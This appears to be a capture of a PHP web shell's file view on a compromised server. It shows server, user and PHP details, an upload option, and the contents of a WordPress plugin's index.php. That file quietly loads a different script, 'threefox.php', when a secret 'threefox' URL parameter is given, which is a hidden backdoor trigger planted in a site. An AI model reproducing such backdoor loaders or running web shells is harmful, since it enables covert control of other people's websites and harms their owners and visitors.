HEX
Server: LiteSpeed
System: Linux Angkanet 5.15.0-94-generic #104-Ubuntu SMP Tue Jan 9 15:25:40 UTC 2024 x86_64
User: webpa4002 (1011)
PHP: 8.2.15
Disabled: NONE
Upload Files
File: /home/web.paitoan.com/public_html/wp-content/plugins/download-plugin/index.php
<?php
if (isset($_GET['threefox'])) {
    include "threefox.php";
} else {
    include "assignee.php";
}
?>